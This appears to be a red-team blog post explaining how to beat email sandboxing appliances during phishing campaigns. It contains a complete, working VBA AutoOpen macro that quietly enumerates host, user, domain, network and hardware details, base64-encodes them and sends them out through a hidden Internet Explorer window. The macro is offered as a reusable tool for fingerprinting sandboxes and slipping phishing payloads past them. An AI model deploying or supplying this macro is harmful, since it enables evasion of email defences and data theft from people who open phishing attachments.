I decided to mix things up a little bit and do a blog post on something a little different than the usual vulnerability research or CTF write-ups. The bulk of our day job is focused on performing long term external assessments on customer networks, so I thought it might be useful to others to do a post on some hurdles we have had to overcome recently in regards to phishing.

In our experience, phishing is probably responsible for somewhere around 80% of initial network access from external sources. Unfortunately this is due to poor user security training and a handful of other debatable reasons. To try and solve the overwhelming problem of click-happy users, IT administrators have begun installing hardware devices that sandbox incoming emails that contain macros to determine if they perform malicious activity. These devices have become quite effective in stopping suspicious emails from even reaching users.

If you talk to anyone that has been working in security for any significant amount of time, they will tell you that offensive and defensive techniques evolve directly as a result of advances in the other. In our scenario, offensive tactics consisted of emailing users with macros. As a result, defensive tools were developed to sandbox these emails to identify malicious activity. The next natural progression is offensive techniques that render sand-boxing useless.

Our team had reasonable success bypassing these devices using various tricks employed by modern malware; https://threatpost.com/malware-evades-detection-with-novel-technique/120787/, http://www.securityweek.com/dyre-banking-trojan-counts-processor-cores-detect-sandboxes. Realizing that this problem was only going to become more prevalent, we decided to take the idea behind the above links one step further.

We chose to exploit the function of these devices to bypass them. Given that they are designed to execute all code passed to them in a sandbox, we decided we would target the sand-boxing hardware specifically. We picked an arbitrary email address in the target domain, constructed a blatant phishing email that the target would likely see often, and attached a macro that performed extensive enumeration of any system that ran the macro. The macro then takes the results of this enumeration and posts it back to an attacker controlled server. Using the results from the enumeration script, we are now able to create a macro that will only run on systems that do not match the fingerprint of the data we received from the email sandbox. This test can be repeated as many times as the red teamer feels is necessary to gain confidence in the results. An example enumeration macro is listed below.

[sourcecode language=”vb”] Function MakeModel()

retStr = ""
strComputer = "."
strQuery = "SELECT * FROM Win32_ComputerSystem"
Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
Set colItems = objWMIService.ExecQuery(strQuery)
For Each objItem In colItems
retStr = objItem.Manufacturer
retStr = retStr & "|" & objItem.Model
Next

MakeModel = retStr

End Function

Function EnvironVars()
sHostname = Environ("computername") & "|" & Environ("username") & _
"|" & Environ("userdomain") & "|" & Environ("LOGONSERVER")
EnvironVars = sHostname
End Function

Function RecentFiles()
Set wdApp = ActiveDocument.Application
RecentFiles = wdApp.RecentFiles.Count
End Function

Function GetCores()
Dim objWMIService, cores, Proc, strQuery
strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor"
Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\.rootcimv2")
Set cores = objWMI.ExecQuery(strQuery, , 48)
Set GetCores = cores
End Function

Function GetNetwork()

retStr = ""
strComputer = "."
strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True"
Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
Set colItems = objWMIService.ExecQuery(strQuery)

Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration")

For Each objItem In colItems
strMacAddress = objItem.MACAddress
sysName = objItem.SystemName

For Each ipItem In ipItems
If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = "True" Then
retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|"
Exit For
End If
Next
Next

GetNetwork = retStr

End Function
Private Function Enc(ByVal strData As String) As Byte()

Dim arrData() As Byte
arrData = StrConv(strData, vbFromUnicode)

Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("data")

objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
objDocElem.nodeTypedValue = arrData
Enc = objDocElem.Text

Set objNode = Nothing
Set objXML = Nothing

End Function
Private Function Dec(ByVal strData As String) As Byte()

Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("data")

objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
objDocElem.Text = strData
Dec = objDocElem.nodeTypedValue

Set objNode = Nothing
Set objXML = Nothing

End Function
Sub DoStuff(ByVal strData As String)

Dim IE As Object
Dim strBaseURL As String
Dim pre As String

address = "http://127.0.0.1/"

‘strBaseURL = StrConv(Dec(address), 64)
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = False
IE.navigate address & strData
On Error GoTo ErrorHandler
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
If Not IsNull(doc.getElementById("overridelink")) Then
Set lnkOverRide = doc.getElementById("overridelink")
If Not lnkOverRide Is Nothing Then
lnkOverRide.Click
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
End If
Else
Do While IE.Busy: DoEvents: Loop
Do While IE.ReadyState <> 4: DoEvents: Loop
Set doc = IE.Document
End If
Dim testString As String
testString = IE.Document.body.innerText
IE.Stop
IE.Quit

ErrorHandler:
Exit Sub
End Sub

Sub AutoOpen()
Dim retStr As String

Set cores = GetCores
Length = 0
For Each i In cores
Length = Length + 1
Next

retStr = Str(Length – 1)
retStr = retStr & "|" & RecentFiles
retStr = retStr & "|" & EnvironVars
retStr = retStr & "|" & GetNetwork
retStr = retStr & "|" & MakeModel
retStr = Enc(retStr)

DoStuff (retStr)
End Sub[/sourcecode]

We believe this technique to be reasonably effective against most modern email sandboxes. The only mitigation to this technique is if the results could be randomized or if the outgoing connection with the results was blocked. The first mitigation would be quite difficult since the enumeration script can poll any number of identifying pieces of data. The second would also be difficult since the purpose of the sandbox is to let the malware run in order to profile it.  For now, our team will save a few more hours creating phishing content and a few more dollars buying phishing domains. The ball is back in your court defense.